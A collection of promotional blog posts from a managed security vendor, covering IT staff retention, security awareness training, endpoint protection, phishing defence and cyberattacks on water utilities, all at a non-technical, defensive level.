In an article posted on the organization’s website, the Center for Strategic and International Studies (CISI.org) reported that, as of January 2019, the United States had 314,000 more available cybersecurity positions than it had trained professionals available to fill them. That was an increase of over 50% since 2015. Globally, this shortfall is expected to grow to 1.8 million by 2022, and that number only applies to cybersecurity positions. The shortage of available trained cyber professionals is impacting all areas of information technology specialization.
Because it is already difficult to find and hire technology pros now and will become even more difficult over time, organizations and managers must focus on retaining the talent they currently have on staff. There are some common reasons given by IT personnel when asked why they are seeking new employment. There are also some common-sense measures managers and their employers can take to address them.
Too much overtime
Personnel shortages, combined with off-hours work associated with tasks like system updates, patching, dealing with threats or incidents, and testing can make for long days for your IT staff. Add to that the unplanned projects that often force IT to move its own projects to the back burner, and the frustration is compounded.
Currently, one of the most popular ways to deal with this issue is to contract with third-party service providers to offload some of the work. If you choose the right provider, you can save a significant amount of time and allow your employees to have the downtime they need to recharge. We have found that this is one of the biggest benefits of our managed security services.
There may also be some non-technical tasks currently being handled by the IT department that could be either shared with, or assigned to, other departments within the organization. Cross-training others to handle these could lighten the load significantly. An example might be physical access security. Because applications used to manage these controls reside on servers, IT often ends up being responsible for access management tasks that could be offloaded to facilities, security, or engineering personnel.
Cross-training within your technology team is also a good idea. Not only does it broaden the skillsets of your staffers, but it also helps ensure that tasks are completed and projects don’t fall behind because only one overworked employee possesses the knowledge and skills needed to handle them.
Limited or no advancement opportunities
No one wants to be stuck in a dead-end job, but, with personnel shortages, promoting someone and back-filling their position could prove to be difficult. Consider, however, that you will need to fill the position anyway when a current employee, frustrated by a lack of advancement opportunities, finds a new job elsewhere. One way of addressing this is to improve communication with your staff. Until you know what their goals are, you can’t help your employees achieve them. Just knowing that you’re interested may give your staffers some hope that they aren’t stuck in a rut, but you’ll need to follow through with action.
Talk with your people one-on-one and come up with ways for each individual to further develop their skillsets. Perhaps they have ideas that would streamline and improve operations. Find ways to allow them to implement those ideas. This may increase their chances for promotion when opportunities arise.
Let upper management and human resources personnel know what you’re doing and why. Find out what new opportunities may be on the horizon and how you can help your people to position themselves for advancement.
Google initially implemented what is known as the 80/20 policy. Employees devote 80% of their time to completing the tasks required to meet their responsibilities. They then spend the remaining 20% working or projects that further develop their skills and make them more valuable to the organization. The more valuable the employee, the less likely upper management will be to let them get away.
Increase opportunities for training
Another way to help your employees prepare for promotions, sharpen their skills, and learn of new industry developments is to ensure that they have access to training. Keep in mind that many training providers offer online coursework that can be completed anytime and from any device with an Internet connection. Some, like the SANS Institute (SANS.org), offer free courses and exercises so that, even if training isn’t in the budget, it’s still accessible. Additionally, when new hardware and software is procured, training is often part of the deal and can be beneficial to both the organization and its employees.
In addition to an overabundance of overtime, a lack of advancement, and the unavailability of training, tech workers often cite issues with their direct managers as their reason for seeking new employment. How you, as a manager, interact with your staffers may have more to do with whether they seek employment elsewhere than any other factor. If they know you’re interested in them and want to help them achieve their goals and be successful, they are more apt to stick around even if advancement opportunities are currently limited or unavailable.
Get buy-in from upper management and HR. Maintain an open-door policy. Frequently speak with them one-on-one. If you say you’ll do something, do it. Be their advocate and be creative. Find ways to give them access to the resources they need and the time required to take advantage of them.
If you are an IT manager looking for information to present to your bosses to emphasize the need for an effective cybersecurity training program, new data from a 2021 research study might be just what you need.
Security services provider Thycotic published the survey results in a report entitled “Balancing Risk, Productivity, and Security.” The firm partnered with SAPIO Research to conduct the survey of 8,041 workers in 15 countries. The results are surprising, if not shocking, and offer a number of reasons for concern.
What researchers learned
The survey revealed that, although more than 85% of those polled said they felt some responsibility for ensuring that they don’t do things that could expose their organizations to increased risk, 51% of respondents believed their IT departments should be completely responsible for preventing their employers from falling victim to cyber attacks. Many in the IT business have encountered and been a bit irritated by this mindset before, but most probably hadn’t imagined that this number would be so high.
Nearly half of respondents (45%) believed cyber attacks posed little or no risk to their organizations. Perhaps that’s why, according to the Thycotic report, 79% of survey participants admitted to having engaged in at least one risky activity within the previous year. The activities included sharing their login credentials with coworkers, using personal devices at work without authorization, using the same password for multiple accounts, and even permitting their company devices to be used by family members.
Why is this happening, and what’s the reason for the lack of concern regarding cybersecurity? Per the survey, a shockingly high 56% of respondents said they had received no cybersecurity training within the previous year. Evidently, they simply don’t know they should be concerned. They’re not be told that their behaviors can create significant risks for their employers or that the IT department can’t stop every attack. Considering the fact that phishing is, and has been for some time, the most utilized attack vector (see Verizon’s Data Breach Investigations Report at verizon.com/business/resources/reports/dbir/) and that the best defense against this and other social engineering attacks is user education, this lack of training is truly alarming.
Recent events increase the threat
With so many working remotely since the pandemic began in 2020, it is critical that employees be given additional training regarding risks associated with remote connectivity, using personal devices to connect to company resources, allowing family members to use company-owned devices, and maintaining the security of their home networks. Effectively, allowing employees to work remotely has transformed what had been local area networks into wide area networks, with home networks becoming part of organizational infrastructure. This significantly expands the attack surface.
Build an effective training program
Effective cybersecurity training programs are ongoing, are continuously updated, and are periodically evaluated to measure their effectiveness and identify areas in need of improvement. They require the active participation of trainees. Merely sending out a newsletter and assuming employees are reading it, understanding the material, and retaining the information isn’t sufficient. They need to be engaged. Requiring them to participate in tabletop exercises and perhaps some classroom or online courses allows them to ask questions. Quizzes ensure that they are paying attention.
Introducing stress into the mix improves retention. An example would be simulated phishing campaigns wherein employees receive suspicious emails and don’t know whether they are real threats or fakes. Offering training employees can benefit from in their personal lives as well as at work gives them more incentive to learn and retain the information.
Monitor Employees’ Endpoints
With a service like Cybriant MDR, you can monitor and protect all endpoints on a 24/7 basis. The service includes a lightweight software installed on all the endpoints you want to protect, and our team watches your endpoints for unusual activity. By using AI technology, we have the ability to detect and prevent attacks before they can fully execute. When a threat is detected, we are able to contain and mitigate threats from all diverse modes of attack.
Endpoint security technologies are vitally important in today’s world of remote work. Hackers are finding new vulnerabilities to attack constantly. Here are 5 endpoint security technologies to defend against cyber threats.
Increasingly sophisticated threats target the endpoint devices that are connected to every organization’s network. These endpoint devices include workstations, employee laptops, and IoT devices. Modern cyber threats can easily evade signature-based technologies that rely on databases of known malware to detect cyber attacks.
This article highlights five advanced endpoint security technologies that organizations need if they want better protection in the current threat landscape.
#1. AI Endpoint Security
Artificial intelligence (AI) has a powerful role to play in advancing the protection of endpoint security. Machine learning algorithms that autonomously improve over time can be used to detect contextual anomalies on endpoint devices that indicate in-progress cyber attacks. These contextual anomalies include unexpected application behavior and logins from new locations or IP addresses.
Data science professionals can train machine learning algorithms using huge datasets of known threats. Additional security-related information can train the algorithms to understand normal patterns of usage across many different endpoint devices. Deployed in endpoint protection solutions, AI can help detect new variants of known malware for which no signature even exists in any database. Signature-based anti-malware technology detects 99 percent of known threats, while AI can help address the most dangerous 1 percent of sophisticated emerging threats.
An increasingly problematic attack vector that threatens endpoint devices is known as a fileless attack. In a fileless attack, the perpetrator uses applications and tools that are already installed on a target endpoint device. It’s harder to detect a fileless attack because it doesn’t require the installation of any new code or the execution of a new file on the endpoint.
Fileless attacks often exploit macros in office applications or scripting languages such as PowerShell. Endpoint solutions with application isolation take a zero-trust approach to application behavior. In practice, application isolation establishes a whitelist of approved applications that can run on an endpoint and sets rules for what each application can do.
For applications that aren’t trusted by default, restrictive controls enable endpoint devices to run the application with limited ability to interact with the operating system or with other trusted applications. The benefit of application isolation is that you dramatically shrink down the attack surface with more granular control over what applications can do on your endpoints.
#3. Endpoint Detection and Response
While it’s better to prevent cyber attacks before they can infiltrate your network, it’s prudent to operate under the assumption that one of your endpoints will be breached at some point. When operating under this assumption, you can put technologies and workflows in place that quickly contain a breach. Endpoint detection and response leverages threat intelligence to detect threats and remediation strategies to contain any damage.
The response aspect of this type of technology typically combines the following automated strategies:
Quarantining any endpoint device on which a threat has been detected and verified
Fully deleting files and their artifacts from any compromised endpoint.
Blacklisting sets of IP addresses or specific URLs from which the threat was detected.
#5. Patch Management
A shocking amount of many high-profile cybersecurity incidents begin with exploiting a software vulnerability for which a security patch already exists. The problem with applying patches is that many organizations use inefficient manual processes to push software updates to endpoints. Sometimes, it’s left to the user of the endpoint to install the update, which is a recipe for disaster.
Smart patch management in the modern threat landscape should automatically apply the latest security updates to different endpoints. The patch management solution should be mandated by the company so that all endpoint devices are covered, which includes personal laptops that employees use to connect to cloud-based business applications.
Deception is an interesting area of cybersecurity that is focused on setting traps for threat actors to reveal their attack techniques or to simply attack phony parts of the network on which no resources exist. A good example is to set up a fake endpoint, which appears to attackers as a host on the network. As soon as you see activity on the fake endpoint, you know an attacker is trying to breach your network, and you can view their activities to get insight into any potential attack vectors they’re trying to deploy.
Another deception tactic is to create fake files with attractive names, such as files with the word “confidential” in the title. Deceiving attackers into revealing their techniques is a good way to get visibility into the real-world threat landscape. Several proprietary security solutions allow you to deploy various types of bait throughout the endpoint devices on your network.
Modern endpoint security must take a layered approach if organizations want adequate defense in the current threat landscape. Ideally, all of these endpoint security technologies should be combined into a single solution for ease of deployment. Many of the largest security vendors have modern endpoint protection solutions with all of these features.
While hackers are getting smarter and more complex, it’s vitally important to set the groundwork to avoid being a phishing victim. Here are three bulletproof ways to avoid being a phishing victim.
We’ve talked about it before and it remains true. Phishing is the #1 threat to your users regarding the protection of your organization’s data.
According to a recent study, Google researchers identified 788,000 potential victims of off-the-shelf keyloggers; 12.4 million potential victims of phishing kits; and 1.9 billion usernames and passwords exposed via data breaches and traded on black market forums. Using this dataset, they explored to what degree the stolen passwords—which originate from thousands of online services—enable an attacker to obtain a victim’s valid email credentials—and thus complete control of their online identity due to transitive trust.
Google’s analysis showed that only less than 7 percent of the passwords exposed in third-party data breaches were valid due to password reuse. Furthermore, the company’s data suggests that credential leaks are less likely to result in account takeover due to a decrease in password reuse rates.
Phishing: The #1 threat to your users
On the other hand, nearly a quarter of the passwords stolen via phishing attacks were valid, and Google believes phishing victims are 460 times more likely to have their accounts hacked compared to random users. As for keyloggers, nearly 12 percent of the compromised passwords were valid, and falling victim to such malware increases the chances of account takeovers 38 times.
How Can Organizations Help Their Users Avoid Becoming Phishing Victims?
As an organization, there are many tools and services available to help detect and remediate any cyber threats that enter your network. Cybriant has put the basic services together in one all-in-one service called CybriantXDR. It’s a comprehensive threat detection and remediation service that gives your greater visibility across your organization. Find out more here: https://cybriant.com/cybriant-xdr/.
While your organization should do everything possible to prevent data breaches, there are several ways to help your users. Here are three bulletproof ways to help your users avoid being phishing victims.
1. Zero Trust Mind Set
When you receive an unexpected email, train your employees to apply a zero-trust mindset. That means do not click on any links, no matter what. Hover over the links and confirm where it is going. Look at the sender, this is an easy way to confirm that is coming from the right person and not an alias.
If they are still unsure, be sure to have a process in place so employees can send it to your IT team so the email can be confirmed.
Andrew was able to examine the email and explore the URL in a sandbox so no harm was done. It was a very authentic-looking email that made it past several of the tools he had in place to block phishing emails as well. Luckily, he was able to avoid becoming a phishing victim and help others learn how to do the same.
2. Multi-Factor Authentication
While this is highly recommended for remote workers, MFA (Multi-Factor Authentication) is important no matter where you work.
Multi-factor authentication adds an additional layer of protection to your IT security environment on top of a strong password policy. With multi-factor authentication, employees can only gain access to systems if they give two or more pieces of identification while signing in. The most practical use of multi-factor authentication is to require a standard username and password combination in addition to a dynamic one-time passcode that only remains valid for one login session.
3. Protect All Endpoints
While all company-owned devices like laptops and cell phones should have the highest level of protection that has been specified by your organization-wide security strategy, many employees are accessing company data through personally-owned devices.
These personally-owned devices should be protected by antivirus or something similar. At Cybriant, we let everyone know that certain cyber threats can make it through traditional antivirus. It may be necessary to block access to company data on personal devices and only allow protected devices to be able to connect to certain applications.
Here are some of the threats that can make it through traditional antivirus:
Advanced Threats. Legacy antivirus depends on prior knowledge to detect threats. Adversaries have access to nation-grade hacking tools which means that new threats are detected daily. AI- and computer learning give us the ability to detect and validate suspicious activity.
Polymorphic Malware. Attackers can easily defeat signature-based antivirus tools that rely on checking a file’s hash against a known hash database.
Malicious Documents. Sometimes a maliciously formatted document is used to exploit vulnerabilities in the opening application to achieve code execution, and legacy AV cannot detect such by reputation.
Fileless Malware. Attackers have realized that traditional AV solutions have a gaping blindspot: malicious processes can be executed in memory without dropping telltale files for AV scanners to find.
Encrypted Traffic. Malicious actors can hide their activities from inspection by ensuring that traffic between the victim and attackers’ command-and-control (C2) server is protected by end-to-end encryption.
Our team of security experts will help stop advanced threats at the endpoint with Cybriant MDR. We utilize AI-based next-gen antivirus that will help you:
PREVENT: Our expert security analysts monitor and record all the events that occur on your endpoints. Our team focuses on relevant threats that attempt data exfiltration or modification. When files attempt to execute these suspicious processes an alert is triggered and the attack is halted in real-time.
DETECT: When a credible threat is detected, our system will retrieve the process history and our team will analyze the chain of events in real-time and determine the validity of the threat. You’ll receive the alerts when threats are detected along with advice and insight from our cybersecurity team to help you mitigate and respond to the threat.
REMEDIATE: Once identified, the malicious activity is immediately stopped in its tracks, and our team guides you through the remediation. This remediation process provides astonishing insight into the data of the threat. You’ll be able to help your organization reduce their attack surface by learning how you’ve been compromised.
Consider Cybriant MDR to help you detect threats that antivirus will certainly miss. Learn more here: cybriant.com/mdr.
Cyberattacks On Utilities. Here are the top two things Water Utilities need to do right now to secure our drinking water supply from cyberattacks.
Nothing seems to be safe from cyberattacks anymore. In 2021 so far, the Colonial Pipeline gas line was hacked resulting in gas shortages across the southeast. Brenntag, a chemical distribution company was compromised, resulting in hackers demanding $7.5 million.
The U.S. Department of Energy is working to implement a national cybersecurity strategy and has so far focused its efforts on the nation’s transmission and generation assets, but utility distribution systems are “increasingly at risk” from intrusion and disruption, according to a report from the Government Accountability Office.
Cyberattacks On Utilities: What about our Water Supply?
On April 1, 2021, federal prosecutors announced that they had indicted Wyatt A. Travnichek for hacking into the computer systems of the Post Rock Rural Water District, where he was once employed, and shutting down the cleaning and disinfection processes. And in February of the same year, a yet-to-be-identified intruder hacked into the water treatment plant at Oldsmar, Florida, and briefly increased the amount of lye, a chemical used to regulate acidity in drinking water, from the normal 100 parts per million to a toxic 11,100 ppm.
These and other types of cyberattacks on utilities are likely to become more and more common in the future. So, what are the top two things water utility companies can do to secure their operations?
Make It Clear That Cybersecurity Everyone’s Responsibility
In many water utility firms, there is a tendency to assume that cybersecurity is the sole responsibility of the IT department. However, modern computer hacks are not always technical; malicious actors sometimes use a range of social and psychological techniques to trick employees into making security mistakes. For this reason, cybersecurity should be an integral part of the overall workplace culture at all levels. Utilities should make it clear that cybersecurity is everyone’s responsibility, from the cleaner to the chief executive. They should take a ‘verify then trust’ approach: every email, file, and approach by a third party should be viewed as a potential threat until proven otherwise.
Reconfigure Remote Access
It is instructive to note that the attacks described in the previous section were possible, in the main part, because the water utilities in question had enabled remote access to their information technology (IT) and operational technology (OT) systems. To prevent such attacks, utilities need to seriously re-look their remote access policies.
Remote access should be disabled as a matter of routine, advises Jake Brodsky, an industrial control systems (ICS) security engineer with over 30 years of experience in the water industry. Where such access is necessary, as is occasionally the case, the feature should be configured in such a way that it has to be manually enabled by someone who is physically present at the facility. For added security, utilities should set access to time out after a brief duration, utilize multi-factor authentication for remote users, and avoid using one account for multiple employees.
These are the two top things most water utility companies need to do to keep their operations – and our water supply – safe from hackers. What else can these companies do to improve security? Tackle the basics, such as performing asset inventories and assessing risk, as well as the more advanced stuff, such as planning in advance for contingencies. Finally, utilities need to share information with each other and industry stakeholders; there is strength in numbers.
We have found that many organizations don’t consider themselves a target for hackers. What we have learned is that it’s not IF but WHEN you will be attacked. CybriantXDR was created with you in mind. This service covers all the basics for a complete cybersecurity strategy including the right people, processes, and technology.
There are multiple advantages of outsourced networking monitoring. No matter your organization’s size, it’s vitally important to protect the data that can be accessed inside and outside of the perimeter.
Ideally, the focus of business management should be its bottom line. The more time businesses spend monitoring their own network infrastructures, the less time they have for managing employees, revamping policies, and researching profit gain strategies.
Aside from time, there is a stress factor that must be considered–business owners or managers who take on the task of monitoring their own network will generally be more stressed, although it’s an avoidable problem. When a business’s income flow depends on the integrity of its computer network, then it can count on dividing its time and energy between profit gain and maintenance of the computers.
Outsourced proactive monitoring is a trend utilized by several businesses to mitigate this problem. Besides saving time and stress, there are other important facets of computer networks that benefit from the outsourcing of proactive monitoring.
Quality Of Service
This refers to the status of network data flow–whether data is transmitting efficiently or not. Optimizing the flow of network data can add up to an abundance of saved time.
Assuming there is already an efficient setup of the physical network, the software built into the network routers, switches, and computers must be configured to allow for the optimization of apps and programs most relevant to a company’s activities.
Fluctuations of data flow within a company’s internal network can be detected and confidently compensated for remotely by trained technicians.
Monitoring Malicious Activity
Businesses using computer networks cannot get around the necessity of efficient security. With the monetization of stolen data on the Deep Web and the glamour pushed by the film industry and hacker culture of successfully hacking computer systems, it’s more important than ever to mitigate risk.
Mitigating security risks inherent in computers and networks is not only about installing antivirus software and setting up push alerts, however–it also includes the proper configuration of routers and switches and can also involve a revamp of the actual physical network setup.
Whatever the case, once the fundamental security measures are configured, remote monitoring of certain metrics can begin and businesses can rest assured knowing they are under professional care. Monitoring in a proactive sense can also include memos pushed by the professionals so that employees are familiar with trending or up-and-coming security threats.
Controlled Software Updates
Updating software installed on computer systems goes hand-in-hand with security and quality of service. It is also a task that can be done remotely and should be done proactively. Software is revamped continually by its manufacturers after glitches are found in the original releases.
Security loopholes are also discovered which the manufacturer will create patches for. These software updates are made available on manufacturer websites or can be configured for automated installation within the programs they are made for.
However, timing the installation of these updates is critical. It generally requires much of the bandwidth (available data speed) of the company’s internet and internal network. The installation should be prioritized in accordance with the interests of the company while weighing the risks of installing vs not installing. In general, it is a good idea to install updates, but updates have been known to bring entire networks down and out of service due to unforeseen glitches in them.
Perhaps manufacturers did not thoroughly test the updates, or another technical anomaly occurred. Whatever the case, service technicians trained in proactive monitoring will take on the task of weighing the risks and installing in a manner where there is minimal if any negative consequence.
The benefits of outsourced management of computers and networks are bountiful. Not only does it close the knowledge gap so that businesses know they are receiving proper care, but it lowers business management stress to a tolerable level. Furthermore, when data residing on business computers is mission-critical, managed IT service providers even have methods and resources for preservation thereof. There is much to be gained.
The number one way to mitigate the damage from any attack on your environment is to prevent it from happening in the first place.
It’s vital to protect your organization from all points of entry and ensure your organization has visibility of all the points of entry that are being accessed by authorized personnel.
CybriantXDR combines the latest technology utilizing machine learning and artificial intelligence with experienced oversight to identify and terminate malicious software before it can execute.